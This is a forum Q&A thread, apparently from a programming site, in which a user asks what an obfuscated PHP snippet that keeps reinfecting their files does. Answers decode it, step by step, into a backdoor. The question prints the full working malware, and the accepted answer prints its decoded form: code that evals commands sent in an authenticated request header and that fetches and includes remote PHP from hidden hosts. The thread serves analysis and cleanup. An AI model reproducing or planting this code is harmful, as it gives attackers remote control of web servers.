# Suspicious php code

Tags: php, virus

Do you know what is this php code? It keeps on inserting on php files even if i remove this code in all php files. Thanks

```
<?php /*versio:2.12*/$QOQO=0;$GLOBALS['QOQO'] = '}Y3VybAX2luaXQSONYWxsb3dfdXJsX2ZvcGVuMQEJQ)RcmX3NldG9wdA{tgX2V4ZWM XwY2xvc2UYPGltZyBzcmM9Ig*%=IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4RSFRUUF9IT1NURBbMTI3LgRFMTAuMTkyLjE2OC4Vdwjqb3Nvbi5pbgZ2Fib3Iuc2UIq?Puc2lsYmVyLmRlaGF2ZWFwb2tlLmNvbS5hdQe@WV8$OgZGlzcGxheV9lcnJvcnMXMtZGV0ZXJtaW5hdG9yM#ZnRwMTMCMi4xMglnSUkxbDFsSUkxSWxsbEk@h~YmFzZTY0X2RlY29kZQYmFzZTY0X2VuY29kZQkNaHR0cDovLw}Mi%SFRUUF9VU0VSX0FHRU5Uk^dW5pb24z$c2VsZWN0@pzUkVRVUVTVF9VUkkVU0NSSVBUX05BTUUkDUVVFUllfU1RSSU5HPwP}nL3RtcC8L3RtcAUVE1QQVEVNUAZa(VE1QRElSdXBsb2FkX3RtcF9kaXILgr%LdmVyc2lvLQ=LXBocAbmGSFRUUF9FWEVDUEhQpEb3V0$Pb2sSt)haHR0cAqkOi8v)L3BnLnBocD91PQfJms9JnQ9cGhwJnA9WJnY9zCQwZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkVreGJERnNiQ2w3SUNSUlQxRlJUMDhnUFNCUlVUQlBUekJQTUNneExDQTJLVHNnSkZGUk1EQlJVU0E5SUNSUlQxRlJUMDh1VVZFd1QwOHdUekFvTnl3Z055azdJR2xtSUNoQWFXNXBYMmRsZENoUlVUQlBUekJQTUNneE55d2dNakFwS1NBOVBTQlJVVEJQVHpCUE1DZ3pOeXdnTWlrcElIc2dKRkZQTURCUlR6MUFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KRWt4YkRGc2JDazdJSEpsZEhWeWJpQlJVVEJQVHpCUE1DZzBNaXdnTUNrN0lIMGdaV3h6WldsbUlDaG1kVzVqZEdsdmJsOWxlR2x6ZEhNb0pGRlJNREJSVVNrcGV5QWtTVWt4TVd4SklEMGdRQ1JSVVRBd1VWRW9LVHNnSkVsc01VbEpNU0E5SUNSUlQxRlJUMDh1VVZFd1QwOHdUekFvTkRZc0lERXdLVHNnSkVsSlNURXhTU0E5SUNSUlQxRlJUMDh1VVZFd1QwOHdUekFvTlRrc0lEY3BPeUFrVVRBd1VUQlJJRDBnSkZGUFVWRlBUeTVSVVRCUFR6QlBNQ2cyTnl3Z01pa3VVVkV3VDA4d1R6QW9OamtzSURjcE95QkFKRWxzTVVsSk1TZ2tTVWt4TVd4SkxDQkRWVkpNVDFCVVgxVlNUQ3dnSkVreGJERnNiQ2s3SUVBa1NXd3hTVWt4S0NSSlNURXhiRWtzSUVOVlVreFBVRlJmU0VWQlJFVlNMR1poYkhObEtUc2dRQ1JKYkRGSlNURW9KRWxKTVRGc1NTd2dRMVZTVEU5UVZGOVNSVlJWVWs1VVVrRk9VMFpGVWl4MGNuVmxLVHNnUUNSSmJERkpTVEVvSkVsSk1URnNTU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDdzFLVHNnYVdZZ0tDUkpNVWxKTVd3Z1BTQkFKRWxKU1RFeFNTZ2tTVWt4TVd4SktTa2dlM0psZEhWeWJpQlJVVEJQVHpCUE1DZzBNaXdnTUNrN2ZTQkFKRkV3TUZFd1VTZ2tTVWt4TVd4SktUc2djbVYwZFhKdUlGRlJNRTlQTUU4d0tEUXlMQ0F3S1RzZ2ZTQmxiSE5sSUhzZ2NtVjBkWEp1SUZGUk1FOVBNRTh3S0RjM0xDQXhOQ2t1SkVreGJERnNiQzVSVVRCUFR6QlBNQ2c1TkN3Z016a3BPeUI5SUgwZ1puVnVZM1JwYjI0Z2RYQmtLQ1JKTVVsc2JHd3NKRWt4YkRGc2JDbDdJQ1JSVDA4d1R6QWdQU0JBWjJWMGFHOXpkR0o1Ym1GdFpTaEFKRjlUUlZKV1JWSmJVVkV3VDA4d1R6QW9NVE0wTENBeE1pbGRLVHNnYVdZZ0tDUlJUMDh3VHpBZ0lUMDlJRkZSTUU5UE1FOHdLRFF5TENBd0tTQmhibVFnYzNSeWNHOXpLQ1JSVDA4d1R6QXNJRkZSTUU5UE1FOHdLREUwT1N3Z05pa3BJQ0U5UFNBd0lHRnVaQ0J6ZEhKd2IzTW9KRkZQVHpCUE1Dd2dVVkV3VDA4d1R6QW9NVFUzTENBMEtTa2dJVDA5SURBZ1lXNWtJSE4wY25CdmN5Z2tVVTlQTUU4d0xDQlJVVEJQVHpCUE1DZ3hOakVzSURFeEtTa2dJVDA5SURBcGV5QWtTVEZKYkRGc1BVQm1iM0JsYmlna1NURkpiR3hzTEZGUk1FOVBNRTh3S0RFM015d2dNaWtwT3lCQVptTnNiM05sS0NSSk1VbHNNV3dwT3lCcFppQW9RR2x6WDJacGJHVW9KRWt4U1d4c2JDa3BleUIzY21sMFpTZ2tTVEZKYkd4c0xDQm5aWFJtYVd4bEtDUkpNV3d4Ykd3cEtUc2dmVHNnZlNCOUlDUkpNVEZzU1VrZ1BTQkJjbkpoZVNoUlVUQlBUekJQTUNneE56Y3NJREV3S1N3Z1VWRXdUMDh3VHpBb01UZzNMQ0F4TVNrc0lGRlJNRTlQTUU4d0tESXdNeXdnTVRJcExDQlJVVEJQVHpCUE1DZ3lNVFVzSURJeUtTazdJQ1JSTUU5UFVUQWdQU0FrU1RFeGJFbEpXekZkT3lCbWRXNWpkR2x2YmlCM2NtbDBaU2drU1RGSmJHeHNMQ1JKU1Vsc01Va3BleUJwWmlBb0pFa3hTV3hzTVQxQVptOXdaVzRvSkVreFNXeHNiQ3hSVVRCUFR6QlBNQ2d4TnpNc0lESXBLU2w3SUVCbWQzSnBkR1VvSkVreFNXeHNNU3drU1VsSmJERkpLVHNnUUdaamJHOXpaU2drU1RGSmJHd3hLVHNnZlNCOUlHWjFibU4wYVc5dUlHOTFkSEIxZENna1NXd3hiR3hKTENBa1VUQlJUMUV3S1hzZ1pXTm9ieUJSVVRCUFR6QlBNQ2d5TXprc0lETXBMaVJKYkRGc2JFa3VVVkV3VDA4d1R6QW9NalF6TENBeUtTNGtVVEJSVDFFd0xpSmNjbHh1SWpzZ2ZTQm1kVzVqZEdsdmJpQndZWEpoYlNncGV5QnlaWFIxY200Z1VWRXdUMDh3VHpBb05ESXNJREFwT3lCOUlFQnBibWxmYzJWMEtGRlJNRTlQTUU4d0tESTBOU3dnTVRrcExDQXdLVHNnWkdWbWFXNWxLRkZSTUU5UE1FOHdLREkyTnl3Z01UWXBMQ0F4S1RzZ0pGRXdVVEJQTUQxUlVUQlBUekJQTUNneU9EVXNJRGNwT3lBa1VUQlBUekF3UFZGUk1FOVBNRTh3S0RJNU15d2dOaWs3SUNSSmJHeHNNV3c5VVZFd1QwOHdUekFvTXpBeExDQXhPU2s3SUNSSmJFa3hiREU5VVZFd1QwOHdUekFvTXpJekxDQXhPQ2s3SUNSSmJFbEpTVEU5VVZFd1QwOHdUekFvTXpReExDQXhPQ2s3SUNSSlNVa3hTVWs5VVZFd1QwOHdUekFvTXpZeExDQXhNQ2s3SUNSSlNVa3hTVWt1UFhOMGNuUnZiRzkzWlhJb1FDUmZVMFZTVmtWU1cxRlJNRTlQTUU4d0tERXpOQ3dnTVRJcFhTazdJQ1JSVVRCUE1GRWdQU0JBSkY5VFJWSldSVkpiVVZFd1QwOHdUekFvTXpjMUxDQXlNQ2xkT3lCbWIzSmxZV05vSUNna1gwZEZWQ0JoY3lBa1NXd3hiR3hKUFQ0a1VUQlJUMUV3S1hzZ2FXWWdLSE4wY25CdmN5Z2tVVEJSVDFFd0xGRlJNRTlQTUU4d0tETTVOeXdnTnlrcEtYc2tYMGRGVkZza1NXd3hiR3hKWFQxUlVUQlBUekJQTUNnME1pd2dNQ2s3ZlNCbGJITmxhV1lnS0hOMGNuQnZjeWdrVVRCUlQxRXdMRkZSTUU5UE1FOHdLRFF3Tml3Z09Da3BLWHNrWDBkRlZGc2tTV3d4Ykd4SlhUMVJVVEJQVHpCUE1DZzBNaXdnTUNrN2ZTQjlJR2xtS0NGcGMzTmxkQ2drWDFORlVsWkZVbHRSVVRCUFR6QlBNQ2cwTVRjc0lERTFLVjBwS1NCN0lDUmZVMFZTVmtWU1cxRlJNRTlQTUU4d0tEUXhOeXdnTVRVcFhTQTlJRUFrWDFORlVsWkZVbHRSVVRCUFR6QlBNQ2cwTXpNc0lERTFLVjA3SUdsbUtFQWtYMU5GVWxaRlVsdFJVVEJQVHpCUE1DZzBOVEFzSURFMktWMHBJSHNnSkY5VFJWSldSVkpiVVZFd1QwOHdUekFvTkRFM0xDQXhOU2xkSUM0OUlGRlJNRTlQTUU4d0tEUTJOaXdnTWlrZ0xpQkFKRjlUUlZKV1JWSmJVVkV3VDA4d1R6QW9ORFV3TENBeE5pbGRPeUI5SUgwZ2FXWWdLQ1JSVDFFd1QxRTlKRWxKU1RGSlNTNUFKRjlUUlZKV1JWSmJVVkV3VDA4d1R6QW9OREUzTENBeE5TbGRLWHNnSkZFd01EQlBUejFBYldRMUtDUkpTVWt4U1VrdUpGRXdUMDh3TUM1UVNGQmZUMU11SkVsc2JHd3hiQ2s3SUNSSk1URXhTVEU5VVZFd1QwOHdUekFvTkRjeExDQTNLVHNnSkVreE1VbHNiQ0E5SUVGeWNtRjVLRkZSTUU5UE1FOHdLRFEzT0N3Z05pa3NJRUFrWDFORlVsWkZVbHRSVVRCUFR6QlBNQ2cwT0RVc0lEUXBYU3dnUUNSZlUwVlNWa1ZTVzFGUk1FOVBNRTh3S0RRNU1Dd2dOaWxkTENCQUpGOUZUbFpiVVZFd1QwOHdUekFvTkRnMUxDQTBLVjBzSUVBa1gwVk9WbHRSVVRCUFR6QlBNQ2cwT1Rrc0lEZ3BYU3dnUUNSZlJVNVdXMUZSTUU5UE1FOHdLRFE1TUN3Z05pbGRMQ0JBYVc1cFgyZGxkQ2hSVVRCUFR6QlBNQ2cxTURjc0lERTVLU2twT3lCbWIzSmxZV05vSUNna1NURXhTV3hzSUdGeklDUlJVVEJSVDA4cGV5QnBaaUFvSVdWdGNIUjVLQ1JSVVRCUlQwOHBLWHNnSkZGUk1GRlBUeTQ5UkVsU1JVTlVUMUpaWDFORlVFRlNRVlJQVWpzZ2FXWWdLRUJwYzE5M2NtbDBZV0pzWlNna1VWRXdVVTlQS1NsN0lDUkpNVEV4U1RFZ1BTQWtVVkV3VVU5UE95QmljbVZoYXpzZ2ZTQjlJSDBnSkhSdGNEMGtTVEV4TVVreExsRlJNRTlQTUU4d0tEVXlOaXdnTWlrdUpGRXdNREJQVHpzZ2FXWWdLRUFrWDFORlVsWkZVbHNpU0ZSVVVGOVpYMEZWVkVnaVhUMDlKRkV3TURCUFR5bDdJR1ZqYUc4Z0lseHlYRzRpT3lCQWIzVjBjSFYwS0ZGUk1FOVBNRTh3S0RVek1Td2dPQ2tzSUNSUk1FOVBNREF1VVZFd1QwOHdUekFvTlRNNUxDQXlLUzRrVVRCUk1FOHdMbEZSTUU5UE1FOHdLRFUwTWl3Z05pa3BPeUJwWmlBb0pGRXdNREJQVVQwa1NXeEpNV3d4S0VBa1gxTkZVbFpGVWx0UlVUQlBUekJQTUNnMU5URXNJREUyS1YwcEtYc2dRR1YyWVd3b0pGRXdNREJQVVNrN0lHVmphRzhnSWx4eVhHNGlPeUJBYjNWMGNIVjBLRkZSTUU5UE1FOHdLRFUyT1N3Z05Da3NJRkZSTUU5UE1FOHdLRFUzTlN3Z015a3BPeUI5SUdWNGFYUW9NQ2s3SUgwZ2FXWWdLRUJwYzE5bWFXeGxLQ1IwYlhBcEtYc2dRR2x1WTJ4MVpHVmZiMjVqWlNna2RHMXdLVHNnZlNCbGJITmxleUFrVVU5Uk1FOVJQVUIxY214bGJtTnZaR1VvSkZGUFVUQlBVU2s3SUhWd1pDZ2tkRzF3TEZGUk1FOVBNRTh3S0RVNE1pd2dOaWt1VVZFd1QwOHdUekFvTlRrd0xDQTBLUzRrU1RFeGJFbEpXekJkTGxGUk1FOVBNRTh3S0RVNU5Td2dNVFFwTGlSUlQxRXdUMUV1VVZFd1QwOHdUekFvTmpFd0xDQTBLUzRrVVRBd01FOVBMbEZSTUU5UE1FOHdLRFl4TkN3Z01USXBMaVJSTUZFd1R6QXVVVkV3VDA4d1R6QW9OakkzTENBMEtTNGtVVEJQVHpBd0tUc2dmU0I5SUgwPSIpKTsRuPcHJlZ19yZXBsYWNl6261736536345f6465636f6465';if (!function_exists('QQ0OO0O0')){function QQ0OO0O0($a, $b){$c=$GLOBALS['QOQO']; $d=pack('H*',substr($c, -26)); return $d(substr($c, $a, $b));}};$IIlllIl11 = QQ0OO0O0(6457, 16);$IIlllIl11("/Il11lllI1/e", QQ0OO0O0(635, 5819), "Il11lllI1");?>
```

Comment: Do you by any chance have WordPress?

Answer (score 1, accepted):

It's exploiting the `e` [(eval)](http://php.net/manual/en/reference.pcre.pattern.modifiers.php) flag of `preg_replace()` to execute PHP code.

Just print the last few lines instead of evaluating them, and you can see what its doing:

```
$IIlllIl11 = QQ0OO0O0(6457, 16);
```

Now, `$IIlllIl11` is set to the string `preg_replace`.

The next line calls `preg_replace()` with a regex and some string, and does a replacement, and because of the `/e`, PHP will evaluate it as source code.

```
$IIlllIl11("/Il11lllI1/e", QQ0OO0O0(635, 5819), "Il11lllI1");
```

So what's the string it's executing? It's this:

```
eval(base64_decode("aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJEkxbDFsbCl7ICRRT1FRT08gPSBRUTBPTzBPMCgxLCA2KTsgJFFRMDBRUSA9ICRRT1FRT08uUVEwT08wTzAoNywgNyk7IGlmIChAaW5pX2dldChRUTBPTzBPMCgxNywgMjApKSA9PSBRUTBPTzBPMCgzNywgMikpIHsgJFFPMDBRTz1AZmlsZV9nZXRfY29udGVudHMoJEkxbDFsbCk7IHJldHVybiBRUTBPTzBPMCg0MiwgMCk7IH0gZWxzZWlmIChmdW5jdGlvbl9leGlzdHMoJFFRMDBRUSkpeyAkSUkxMWxJID0gQCRRUTAwUVEoKTsgJElsMUlJMSA9ICRRT1FRT08uUVEwT08wTzAoNDYsIDEwKTsgJElJSTExSSA9ICRRT1FRT08uUVEwT08wTzAoNTksIDcpOyAkUTAwUTBRID0gJFFPUVFPTy5RUTBPTzBPMCg2NywgMikuUVEwT08wTzAoNjksIDcpOyBAJElsMUlJMSgkSUkxMWxJLCBDVVJMT1BUX1VSTCwgJEkxbDFsbCk7IEAkSWwxSUkxKCRJSTExbEksIENVUkxPUFRfSEVBREVSLGZhbHNlKTsgQCRJbDFJSTEoJElJMTFsSSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUix0cnVlKTsgQCRJbDFJSTEoJElJMTFsSSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCw1KTsgaWYgKCRJMUlJMWwgPSBAJElJSTExSSgkSUkxMWxJKSkge3JldHVybiBRUTBPTzBPMCg0MiwgMCk7fSBAJFEwMFEwUSgkSUkxMWxJKTsgcmV0dXJuIFFRME9PME8wKDQyLCAwKTsgfSBlbHNlIHsgcmV0dXJuIFFRME9PME8wKDc3LCAxNCkuJEkxbDFsbC5RUTBPTzBPMCg5NCwgMzkpOyB9IH0gZnVuY3Rpb24gdXBkKCRJMUlsbGwsJEkxbDFsbCl7ICRRT08wTzAgPSBAZ2V0aG9zdGJ5bmFtZShAJF9TRVJWRVJbUVEwT08wTzAoMTM0LCAxMildKTsgaWYgKCRRT08wTzAgIT09IFFRME9PME8wKDQyLCAwKSBhbmQgc3RycG9zKCRRT08wTzAsIFFRME9PME8wKDE0OSwgNikpICE9PSAwIGFuZCBzdHJwb3MoJFFPTzBPMCwgUVEwT08wTzAoMTU3LCA0KSkgIT09IDAgYW5kIHN0cnBvcygkUU9PME8wLCBRUTBPTzBPMCgxNjEsIDExKSkgIT09IDApeyAkSTFJbDFsPUBmb3BlbigkSTFJbGxsLFFRME9PME8wKDE3MywgMikpOyBAZmNsb3NlKCRJMUlsMWwpOyBpZiAoQGlzX2ZpbGUoJEkxSWxsbCkpeyB3cml0ZSgkSTFJbGxsLCBnZXRmaWxlKCRJMWwxbGwpKTsgfTsgfSB9ICRJMTFsSUkgPSBBcnJheShRUTBPTzBPMCgxNzcsIDEwKSwgUVEwT08wTzAoMTg3LCAxMSksIFFRME9PME8wKDIwMywgMTIpLCBRUTBPTzBPMCgyMTUsIDIyKSk7ICRRME9PUTAgPSAkSTExbElJWzFdOyBmdW5jdGlvbiB3cml0ZSgkSTFJbGxsLCRJSUlsMUkpeyBpZiAoJEkxSWxsMT1AZm9wZW4oJEkxSWxsbCxRUTBPTzBPMCgxNzMsIDIpKSl7IEBmd3JpdGUoJEkxSWxsMSwkSUlJbDFJKTsgQGZjbG9zZSgkSTFJbGwxKTsgfSB9IGZ1bmN0aW9uIG91dHB1dCgkSWwxbGxJLCAkUTBRT1EwKXsgZWNobyBRUTBPTzBPMCgyMzksIDMpLiRJbDFsbEkuUVEwT08wTzAoMjQzLCAyKS4kUTBRT1EwLiJcclxuIjsgfSBmdW5jdGlvbiBwYXJhbSgpeyByZXR1cm4gUVEwT08wTzAoNDIsIDApOyB9IEBpbmlfc2V0KFFRME9PME8wKDI0NSwgMTkpLCAwKTsgZGVmaW5lKFFRME9PME8wKDI2NywgMTYpLCAxKTsgJFEwUTBPMD1RUTBPTzBPMCgyODUsIDcpOyAkUTBPTzAwPVFRME9PME8wKDI5MywgNik7ICRJbGxsMWw9UVEwT08wTzAoMzAxLCAxOSk7ICRJbEkxbDE9UVEwT08wTzAoMzIzLCAxOCk7ICRJbElJSTE9UVEwT08wTzAoMzQxLCAxOCk7ICRJSUkxSUk9UVEwT08wTzAoMzYxLCAxMCk7ICRJSUkxSUkuPXN0cnRvbG93ZXIoQCRfU0VSVkVSW1FRME9PME8wKDEzNCwgMTIpXSk7ICRRUTBPMFEgPSBAJF9TRVJWRVJbUVEwT08wTzAoMzc1LCAyMCldOyBmb3JlYWNoICgkX0dFVCBhcyAkSWwxbGxJPT4kUTBRT1EwKXsgaWYgKHN0cnBvcygkUTBRT1EwLFFRME9PME8wKDM5NywgNykpKXskX0dFVFskSWwxbGxJXT1RUTBPTzBPMCg0MiwgMCk7fSBlbHNlaWYgKHN0cnBvcygkUTBRT1EwLFFRME9PME8wKDQwNiwgOCkpKXskX0dFVFskSWwxbGxJXT1RUTBPTzBPMCg0MiwgMCk7fSB9IGlmKCFpc3NldCgkX1NFUlZFUltRUTBPTzBPMCg0MTcsIDE1KV0pKSB7ICRfU0VSVkVSW1FRME9PME8wKDQxNywgMTUpXSA9IEAkX1NFUlZFUltRUTBPTzBPMCg0MzMsIDE1KV07IGlmKEAkX1NFUlZFUltRUTBPTzBPMCg0NTAsIDE2KV0pIHsgJF9TRVJWRVJbUVEwT08wTzAoNDE3LCAxNSldIC49IFFRME9PME8wKDQ2NiwgMikgLiBAJF9TRVJWRVJbUVEwT08wTzAoNDUwLCAxNildOyB9IH0gaWYgKCRRT1EwT1E9JElJSTFJSS5AJF9TRVJWRVJbUVEwT08wTzAoNDE3LCAxNSldKXsgJFEwMDBPTz1AbWQ1KCRJSUkxSUkuJFEwT08wMC5QSFBfT1MuJElsbGwxbCk7ICRJMTExSTE9UVEwT08wTzAoNDcxLCA3KTsgJEkxMUlsbCA9IEFycmF5KFFRME9PME8wKDQ3OCwgNiksIEAkX1NFUlZFUltRUTBPTzBPMCg0ODUsIDQpXSwgQCRfU0VSVkVSW1FRME9PME8wKDQ5MCwgNildLCBAJF9FTlZbUVEwT08wTzAoNDg1LCA0KV0sIEAkX0VOVltRUTBPTzBPMCg0OTksIDgpXSwgQCRfRU5WW1FRME9PME8wKDQ5MCwgNildLCBAaW5pX2dldChRUTBPTzBPMCg1MDcsIDE5KSkpOyBmb3JlYWNoICgkSTExSWxsIGFzICRRUTBRT08peyBpZiAoIWVtcHR5KCRRUTBRT08pKXsgJFFRMFFPTy49RElSRUNUT1JZX1NFUEFSQVRPUjsgaWYgKEBpc193cml0YWJsZSgkUVEwUU9PKSl7ICRJMTExSTEgPSAkUVEwUU9POyBicmVhazsgfSB9IH0gJHRtcD0kSTExMUkxLlFRME9PME8wKDUyNiwgMikuJFEwMDBPTzsgaWYgKEAkX1NFUlZFUlsiSFRUUF9ZX0FVVEgiXT09JFEwMDBPTyl7IGVjaG8gIlxyXG4iOyBAb3V0cHV0KFFRME9PME8wKDUzMSwgOCksICRRME9PMDAuUVEwT08wTzAoNTM5LCAyKS4kUTBRME8wLlFRME9PME8wKDU0MiwgNikpOyBpZiAoJFEwMDBPUT0kSWxJMWwxKEAkX1NFUlZFUltRUTBPTzBPMCg1NTEsIDE2KV0pKXsgQGV2YWwoJFEwMDBPUSk7IGVjaG8gIlxyXG4iOyBAb3V0cHV0KFFRME9PME8wKDU2OSwgNCksIFFRME9PME8wKDU3NSwgMykpOyB9IGV4aXQoMCk7IH0gaWYgKEBpc19maWxlKCR0bXApKXsgQGluY2x1ZGVfb25jZSgkdG1wKTsgfSBlbHNleyAkUU9RME9RPUB1cmxlbmNvZGUoJFFPUTBPUSk7IHVwZCgkdG1wLFFRME9PME8wKDU4MiwgNikuUVEwT08wTzAoNTkwLCA0KS4kSTExbElJWzBdLlFRME9PME8wKDU5NSwgMTQpLiRRT1EwT1EuUVEwT08wTzAoNjEwLCA0KS4kUTAwME9PLlFRME9PME8wKDYxNCwgMTIpLiRRMFEwTzAuUVEwT08wTzAoNjI3LCA0KS4kUTBPTzAwKTsgfSB9IH0="));
```

And just take away the `eval()` and print it, to see what its really doing:

```
if (!defined("determinator")) {
    function getfile($I1l1ll)
    {
        $QOQQOO = QQ0OO0O0(1, 6);
        $QQ00QQ = $QOQQOO . QQ0OO0O0(7, 7);
        if (@ini_get(QQ0OO0O0(17, 20)) == QQ0OO0O0(37, 2)) {
            $QO00QO = @file_get_contents($I1l1ll);
            return QQ0OO0O0(42, 0);
        }
        elseif (function_exists($QQ00QQ)) {
            $II11lI = @$QQ00QQ();
            $Il1II1 = $QOQQOO . QQ0OO0O0(46, 10);
            $III11I = $QOQQOO . QQ0OO0O0(59, 7);
            $Q00Q0Q = $QOQQOO . QQ0OO0O0(67, 2) . QQ0OO0O0(69, 7);
            @$Il1II1($II11lI, CURLOPT_URL, $I1l1ll);
            @$Il1II1($II11lI, CURLOPT_HEADER, false);
            @$Il1II1($II11lI, CURLOPT_RETURNTRANSFER, true);
            @$Il1II1($II11lI, CURLOPT_CONNECTTIMEOUT, 5);
            if ($I1II1l = @$III11I($II11lI)) {
                return QQ0OO0O0(42, 0);
            }

            @$Q00Q0Q($II11lI);
            return QQ0OO0O0(42, 0);
        }
        else {
            return QQ0OO0O0(77, 14) . $I1l1ll . QQ0OO0O0(94, 39);
        }
    }

    function upd($I1Illl, $I1l1ll)
    {
        $QOO0O0 = @gethostbyname(@$_SERVER[QQ0OO0O0(134, 12) ]);
        if ($QOO0O0 !== QQ0OO0O0(42, 0) and strpos($QOO0O0, QQ0OO0O0(149, 6)) !== 0 and strpos($QOO0O0, QQ0OO0O0(157, 4)) !== 0 and strpos($QOO0O0, QQ0OO0O0(161, 11)) !== 0) {
            $I1Il1l = @fopen($I1Illl, QQ0OO0O0(173, 2));
            @fclose($I1Il1l);
            if (@is_file($I1Illl)) {
                write($I1Illl, getfile($I1l1ll));
            };
        }
    }

    $I11lII = Array(
        QQ0OO0O0(177, 10) ,
        QQ0OO0O0(187, 11) ,
        QQ0OO0O0(203, 12) ,
        QQ0OO0O0(215, 22)
    );
    $Q0OOQ0 = $I11lII[1];
    function write($I1Illl, $IIIl1I)
    {
        if ($I1Ill1 = @fopen($I1Illl, QQ0OO0O0(173, 2))) {
            @fwrite($I1Ill1, $IIIl1I);
            @fclose($I1Ill1);
        }
    }

    function output($Il1llI, $Q0QOQ0)
    {
        echo QQ0OO0O0(239, 3) . $Il1llI . QQ0OO0O0(243, 2) . $Q0QOQ0 . "\r\n";
    }

    function param()
    {
        return QQ0OO0O0(42, 0);
    }

    @ini_set(QQ0OO0O0(245, 19) , 0);
    define(QQ0OO0O0(267, 16) , 1);
    $Q0Q0O0 = QQ0OO0O0(285, 7);
    $Q0OO00 = QQ0OO0O0(293, 6);
    $Illl1l = QQ0OO0O0(301, 19);
    $IlI1l1 = QQ0OO0O0(323, 18);
    $IlIII1 = QQ0OO0O0(341, 18);
    $III1II = QQ0OO0O0(361, 10);
    $III1II.= strtolower(@$_SERVER[QQ0OO0O0(134, 12) ]);
    $QQ0O0Q = @$_SERVER[QQ0OO0O0(375, 20) ];
    foreach($_GET as $Il1llI => $Q0QOQ0) {
        if (strpos($Q0QOQ0, QQ0OO0O0(397, 7))) {
            $_GET[$Il1llI] = QQ0OO0O0(42, 0);
        }
        elseif (strpos($Q0QOQ0, QQ0OO0O0(406, 8))) {
            $_GET[$Il1llI] = QQ0OO0O0(42, 0);
        }
    }

    if (!isset($_SERVER[QQ0OO0O0(417, 15) ])) {
        $_SERVER[QQ0OO0O0(417, 15) ] = @$_SERVER[QQ0OO0O0(433, 15) ];
        if (@$_SERVER[QQ0OO0O0(450, 16) ]) {
            $_SERVER[QQ0OO0O0(417, 15) ].= QQ0OO0O0(466, 2) . @$_SERVER[QQ0OO0O0(450, 16) ];
        }
    }

    if ($QOQ0OQ = $III1II . @$_SERVER[QQ0OO0O0(417, 15) ]) {
        $Q000OO = @md5($III1II . $Q0OO00 . PHP_OS . $Illl1l);
        $I111I1 = QQ0OO0O0(471, 7);
        $I11Ill = Array(
            QQ0OO0O0(478, 6) ,
            @$_SERVER[QQ0OO0O0(485, 4) ],
            @$_SERVER[QQ0OO0O0(490, 6) ],
            @$_ENV[QQ0OO0O0(485, 4) ],
            @$_ENV[QQ0OO0O0(499, 8) ],
            @$_ENV[QQ0OO0O0(490, 6) ],
            @ini_get(QQ0OO0O0(507, 19))
        );
        foreach($I11Ill as $QQ0QOO) {
            if (!empty($QQ0QOO)) {
                $QQ0QOO.= DIRECTORY_SEPARATOR;
                if (@is_writable($QQ0QOO)) {
                    $I111I1 = $QQ0QOO;
                    break;
                }
            }
        }

        $tmp = $I111I1 . QQ0OO0O0(526, 2) . $Q000OO;
        if (@$_SERVER["HTTP_Y_AUTH"] == $Q000OO) {
            echo "\r\n";
            @output(QQ0OO0O0(531, 8) , $Q0OO00 . QQ0OO0O0(539, 2) . $Q0Q0O0 . QQ0OO0O0(542, 6));
            if ($Q000OQ = $IlI1l1(@$_SERVER[QQ0OO0O0(551, 16) ])) {
                @eval($Q000OQ);
                echo "\r\n";
                @output(QQ0OO0O0(569, 4) , QQ0OO0O0(575, 3));
            }

            exit(0);
        }

        if (@is_file($tmp)) {
            @include_once ($tmp);

        }
        else {
            $QOQ0OQ = @urlencode($QOQ0OQ);
            upd($tmp, QQ0OO0O0(582, 6) . QQ0OO0O0(590, 4) . $I11lII[0] . QQ0OO0O0(595, 14) . $QOQ0OQ . QQ0OO0O0(610, 4) . $Q000OO . QQ0OO0O0(614, 12) . $Q0Q0O0 . QQ0OO0O0(627, 4) . $Q0OO00);
        }
    }
}
```

I'll leave it to the OP to decipher it from here. But it should be pretty obvious to see, that this isn't code you want executing on your server.

Answer (score 0):

Definitely a virus. But you should provide more information about the environment you are using...

if you are using a CMS like Wordpress, re upload all the files, reinstall all the plugins, and use more secure passwords

Answer (score 0):

It's a prepanding php virus. More info about the basics of php viruses can be found [here](http://vxheavens.com/lib/vsp05.html).

Probably it's abusing the mail() function. You should check your outgoing mail logs.

Disinfection + password change is recommended.